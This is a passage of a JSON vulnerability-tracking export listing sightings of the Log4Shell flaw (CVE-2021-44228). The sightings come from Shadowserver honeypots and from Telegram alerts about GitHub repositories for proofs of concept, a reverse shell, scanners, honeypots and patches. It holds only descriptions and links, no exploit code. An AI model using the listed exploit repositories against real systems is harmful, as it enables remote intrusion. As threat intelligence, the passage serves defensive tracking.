"exploited", "source": "https://t.me/GithubRedTeam/1142", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aDocker images and k8s YAMLs for Log4j Vulnerability POC (Log4j (CVE-2021-44228 RCE Vulnerability)\nURL\uff1ahttps://github.com/ankur-katiyar/log4j-docker", "creation_timestamp": "2021-12-17T19:55:41.000000Z"}, {"uuid": "e02c72b0-b742-4990-9310-d07cf09df676", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-04-11)", "content": "", "creation_timestamp": "2026-04-11T00:00:00.000000Z"}, {"uuid": "3ab5da66-a8ef-4fad-b0a4-7b6d8a2239e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-11)", "content": "", "creation_timestamp": "2026-04-11T00:00:00.000000Z"}, {"uuid": "05b69b5b-a02c-4622-bb33-0d110d68e20d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1113", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aA honeypot for the Log4Shell vulnerability (CVE-2021-44228).\nURL\uff1ahttps://github.com/thomaspatzke/Log4Pot", "creation_timestamp": "2021-12-16T14:10:13.000000Z"}, {"uuid": "2eeebc3a-cdbc-4999-8494-df2edb19bf4c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1042", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aPCRE RegEx matching Log4Shell CVE-2021-44228 IOC in your logs\nURL\uff1ahttps://github.com/back2root/log4shell-rex", "creation_timestamp": "2021-12-14T00:43:05.000000Z"}, {"uuid": "2d66a9a2-8d68-4371-a507-5dbca8dbee88", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1096", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aA Remote Code Execution PoC for Log4Shell (CVE-2021-44228)\nURL\uff1ahttps://github.com/ubitech/cve-2021-44228-rce-poc", "creation_timestamp": "2021-12-15T23:05:11.000000Z"}, {"uuid": "c818ee4e-2543-48f0-a3b3-40a66997e442", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1095", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aDockerized honeypot for CVE-2021-44228.\nURL\uff1ahttps://github.com/michaelsanford/Log4Shell-Honeypot", "creation_timestamp": "2021-12-15T21:20:35.000000Z"}, {"uuid": "d7e7b600-27f5-4f00-95fe-895f84083435", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1094", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aLog4j2 CVE-2021-44228 revshell\nURL\uff1ahttps://github.com/faisalfs10x/Log4j2-CVE-2021-44228-revshell", "creation_timestamp": "2021-12-15T19:34:31.000000Z"}, {"uuid": "a15d0e94-5bc5-41e0-bcd0-88f8261772aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1093", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aA scanner and a proof of sample exploit for  log4j RCE CVE-2021-44228 \nURL\uff1ahttps://github.com/isuruwa/Log4j", "creation_timestamp": "2021-12-15T19:17:27.000000Z"}, {"uuid": "060c2a5a-bad6-4953-901a-7b6cfede6862", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1102", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aThis Log4j RCE exploit originated from https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce\nURL\uff1ahttps://github.com/roxas-tan/CVE-2021-44228", "creation_timestamp": "2021-12-16T08:46:28.000000Z"}, {"uuid": "11163ceb-2538-4ca9-bc6f-7e23db19245d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1101", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aHoneypot for CVE-2021-44228\nURL\uff1ahttps://github.com/wortell/log4j-honeypot", "creation_timestamp": "2021-12-16T08:16:03.000000Z"}, {"uuid": "bab44e25-1ae8-47d3-b461-f37b99c0eebb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1168", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aIdentifying all log4j components across on local windows servers. CVE-2021-44228\nURL\uff1ahttps://github.com/KeysAU/Get-log4j-Windows-local", "creation_timestamp": "2021-12-19T07:55:03.000000Z"}, {"uuid": "13b5cb25-99a9-4761-9fcc-5fb028dfbd60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1175", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aExploiting CVE-2021-44228 in vCenter for remote code execution and more. \nURL\uff1ahttps://github.com/puzzlepeaches/Log4jCenter", "creation_timestamp": "2021-12-19T19:20:14.000000Z"}, {"uuid": "534a6859-7d9b-4247-9c79-2ae29431bb6d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1186", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1alog4j2 RCE\u6f0f\u6d1e\uff08CVE-2021-44228)\u5185\u7f51\u626b\u63cf\u5668\uff0c\u53ef\u7528\u4e8e\u5728\u4e0d\u51fa\u7f51\u7684\u6761\u4ef6\u4e0b\u8fdb\u884c\u6f0f\u6d1e\u626b\u63cf\uff0c\u5e2e\u52a9\u4f01\u4e1a\u5185\u90e8\u5feb\u901f\u53d1\u73b0Log4jShell\u6f0f\u6d1e\u3002\nURL\uff1ahttps://github.com/Y0-kan/Log4jShell-Scan", "creation_timestamp": "2021-12-20T13:46:55.000000Z"}, {"uuid": "bdc34d97-93bc-417a-acec-96f000dadcbc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1185", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aShell script to fix Log4J jar files from CVE-2021-44228, a.k.a., #Log4Shell\nURL\uff1ahttps://github.com/dmitsuo/log4shell-war-fixer", "creation_timestamp": "2021-12-20T13:21:46.000000Z"}, {"uuid": "d22dd4b7-5957-4b98-b896-3dca952b863c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1041", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aProva de conceito da vulnerabulidade CVE-2021-44228.\nURL\uff1ahttps://github.com/igoritos22/log4jpoc", "creation_timestamp": "2021-12-13T23:22:32.000000Z"}, {"uuid": "cb7aeea0-2175-484d-bd6b-7f3591649200", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1039", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aA singular file to protect as many Minecraft servers and clients as possible from the Log4j exploit (CVE-2021-44228).\nURL\uff1ahttps://github.com/Koupah/MC-Log4j-Patcher", "creation_timestamp": "2021-12-13T22:44:40.000000Z"}, {"uuid": "67fc022c-672a-477a-b988-cad6a17b4218", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1051", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aEndpoint to test CVE-2021-44228 \u2013 Log4j 2\nURL\uff1ahttps://github.com/andrii-kovalenko-celonis/log4j-vulnerability-demo", "creation_timestamp": "2021-12-14T08:59:07.000000Z"}, {"uuid": "0ffad870-6b22-4951-93c2-f8394c322697", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1049", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCheck CVE-2021-44228 vulnerability\nURL\uff1ahttps://github.com/codiobert/log4j-scanner", "creation_timestamp": "2021-12-14T08:03:28.000000Z"}, {"uuid": "52362fbb-1a1d-472f-bec5-ea3e28c7bac4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1047", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aA Nuclei template for Apache Solr affected by Apache Log4J CVE-2021-44228\nURL\uff1ahttps://github.com/toramanemre/apache-solr-log4j-CVE-2021-44228", "creation_timestamp": "2021-12-14T06:55:18.000000Z"}, {"uuid": "eb9e7c1c-a81b-4245-b867-5220a5e55a05", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1046", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aSome siimple checks to see if JAR file is vulnerable to CVE-2021-44228\nURL\uff1ahttps://github.com/gcmurphy/chk_log4j", "creation_timestamp": "2021-12-14T06:04:48.000000Z"}, {"uuid": "37cdb07d-0b68-4550-b3fa-b7826dd635ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1045", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aSimple Python 3 script to detect the \\\"Log4j\\\" Java library vulnerability (CVE-2021-44228) for a list of URL with multithreading\nURL\uff1ahttps://github.com/Woahd/log4j-urlscanner", "creation_timestamp": "2021-12-14T05:26:45.000000Z"}, {"uuid": "2212093b-63af-4445-bf6a-17d8b3bbbece", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1057", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1alog4j version 1 with a patch for CVE-2021-44228 vulnerability\nURL\uff1ahttps://github.com/p3dr16k/log4j-1.2.15-mod", "creation_timestamp": "2021-12-14T11:41:17.000000Z"}, {"uuid": "637e05b3-6518-49e1-9a57-7e24488f3a16", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1056", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aBash and PowerShell scripts to scan a local filesystem for Log4j components vulnerable to CVE-2021-44228 / Log4Shell.\nURL\uff1ahttps://github.com/Occamsec/log4j-checker", "creation_timestamp": "2021-12-14T11:32:40.000000Z"}, {"uuid": "3393146e-f586-4577-9ff1-d217df2c3f14", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/cKure/8403", "content": "\u25a0\u25a0\u25a0\u25a0\u25a1 CVE-2021-44228 | Log4Shell: Critical vulnerability in Apache Log4j | Kaspersky official blog.\n\nhttps://www.kaspersky.com/blog/log4shell-critical-vulnerability-in-apache-log4j/43124/", "creation_timestamp": "2021-12-11T18:48:06.000000Z"}, {"uuid": "57f388d6-8260-4b5d-b656-d02754e12280", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1088", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1ademo project to highlight how to execute the log4j (CVE-2021-44228) vulnerability\nURL\uff1ahttps://github.com/kossatzd/log4j-CVE-2021-44228-test", "creation_timestamp": "2021-12-15T14:39:36.000000Z"}, {"uuid": "5cbdf3a4-8d15-4d37-a423-cf1728ff7939", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1089", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aApache Log4j Zero Day Vulnerability aka Log4Shell aka CVE-2021-44228\nURL\uff1ahttps://github.com/kubearmor/log4j-cve", "creation_timestamp": "2021-12-15T15:13:57.000000Z"}, {"uuid": "c533aafc-893b-4df5-8cc2-e2b6a6fb6a23", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1110", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aBurp Active Scan extension to identify Log4j vulnerabilities CVE-2021-44228 an CVE-2021-45046\nURL\uff1ahttps://github.com/freskimo/Burp-Log4j-HammerTime", "creation_timestamp": "2021-12-16T13:18:21.000000Z"}, {"uuid": "799072ab-0c1c-455e-af54-49ded6ba03a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1198", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aWindows Batch Scrip to Fix the log4j-issue-CVE-2021-44228\nURL\uff1ahttps://github.com/chandru-gunasekaran/log4j-fix-CVE-2021-44228", "creation_timestamp": "2021-12-21T14:57:10.000000Z"}, {"uuid": "b8bc5536-2596-40b2-9eec-aef88fcefc97", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1197", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aSearches filesystem for CVE-2021-44228 and CVE-2021-45046 vulnerable instances of log4j library, including embedded (jar/war/zip) packaged ones.\nURL\uff1ahttps://github.com/HynekPetrak/log4shell-finder", "creation_timestamp": "2021-12-21T12:28:27.000000Z"}, {"uuid": "7336860e-bcb9-4414-aa28-8bc9ff0334e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1203", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aAnsible detector scanner playbook to verify target Linux hosts using the official Red Hat Log4j detector script Remote Code Execution - log4j (CVE-2021-44228)\nURL\uff1ahttps://github.com/lucab85/log4j-cve-2021-44228", "creation_timestamp": "2021-12-21T22:32:23.000000Z"}, {"uuid": "e5e9f776-8c6c-4ed8-875b-16120d7b7e1b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1202", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aLog4j2 CVE-2021-44228 hack demo for a springboot app\nURL\uff1ahttps://github.com/rejupillai/log4j2-hack-springboot", "creation_timestamp": "2021-12-21T17:43:20.000000Z"}, {"uuid": "62788c01-df0e-45c0-b4cb-b7b2c69358e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-10)", "content": "", "creation_timestamp": "2026-04-10T00:00:00.000000Z"}, {"uuid": "dbac267a-0d2b-4a3e-ae67-b7be5a8a7cae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "Telegram/0RRAbSvsgLzYe1FKfBU6ATvqxF6wYAFGvBfk8O-WmecysoY", "content": "", "creation_timestamp": "2025-06-21T15:00:06.000000Z"}, {"uuid": "5ffe58f5-820a-4339-ad84-900a03264526", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1119", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aBurp Active Scan extension to identify Log4j vulnerabilities CVE-2021-44228 and CVE-2021-45046\nURL\uff1ahttps://github.com/DXC-StrikeForce/Burp-Log4j-HammerTime", "creation_timestamp": "2021-12-16T16:59:08.000000Z"}, {"uuid": "39bfeb53-a914-4617-91db-950a7455846b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1147", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1acan find, analyse and patch Log4J files because of CVE-2021-44228, CVE-2021-45046\nURL\uff1ahttps://github.com/DANSI/PowerShell-Log4J-Scanner", "creation_timestamp": "2021-12-18T00:56:11.000000Z"}, {"uuid": "3185470e-c781-4b77-b5e9-adf2c9154ad9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1157", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aDetections for CVE-2021-44228 inside of nested binaries\nURL\uff1ahttps://github.com/darkarnium/Log4j-CVE-Detect", "creation_timestamp": "2021-12-18T11:50:30.000000Z"}, {"uuid": "83eaac90-4a5f-4aa5-bfda-be7600bb353a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1167", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aAn Inspec profile to check for Log4j CVE-2021-44228 and CVE-2021-45046\nURL\uff1ahttps://github.com/trickyearlobe/inspec-log4j", "creation_timestamp": "2021-12-19T05:27:09.000000Z"}, {"uuid": "f8476bd1-15b0-4c3d-82f8-a52318c83eab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1117", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aLog4Shell CVE-2021-44228 Vulnerability Scanner and POC\nURL\uff1ahttps://github.com/gyaansastra/CVE-2021-44228", "creation_timestamp": "2021-12-16T15:06:38.000000Z"}, {"uuid": "45cca0a7-17a8-4840-9051-fea2549cf8c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1166", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aVulerability analysis, patch management and exploitation tool CVE-2021-44228 / CVE-2021-45046 / CVE-2021-4104\nURL\uff1ahttps://github.com/TheInterception/Log4J-Simulation-Tool", "creation_timestamp": "2021-12-19T05:14:34.000000Z"}, {"uuid": "0ce51ead-0a2c-4120-87d5-fa79683cb677", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1172", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aA fully automated, accurate, and extensive scanner for finding log4j RCE CVE-2021-44228\nURL\uff1ahttps://github.com/Rk-000/Log4j_scan_Advance", "creation_timestamp": "2021-12-19T14:25:57.000000Z"}, {"uuid": "f2dc81b6-22c6-4b91-8a4e-daef6dc5bee1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1171", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aDemo to show how Log4Shell / CVE-2021-44228 vulnerability works\nURL\uff1ahttps://github.com/mschmnet/Log4Shell-demo", "creation_timestamp": "2021-12-19T11:02:22.000000Z"}, {"uuid": "0746912b-b72a-4612-a6e4-0fa4e702e421", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1123", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aLog4Shell Proof of Concept (CVE-2021-44228)\nURL\uff1ahttps://github.com/Kr0ff/CVE-2021-44228", "creation_timestamp": "2021-12-16T21:21:17.000000Z"}, {"uuid": "49b37c5b-5357-4165-b3e5-0b2742147abb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1122", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aSamples of log4j library versions to help log4j scanners / detectors improve their accuracy for detecting CVE-2021-45046 and CVE-2021-44228.\nURL\uff1ahttps://github.com/mergebase/log4j-samples", "creation_timestamp": "2021-12-16T21:04:20.000000Z"}, {"uuid": "6ace0411-b9ce-43c5-82ae-7ab4b0e553b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1146", "content": 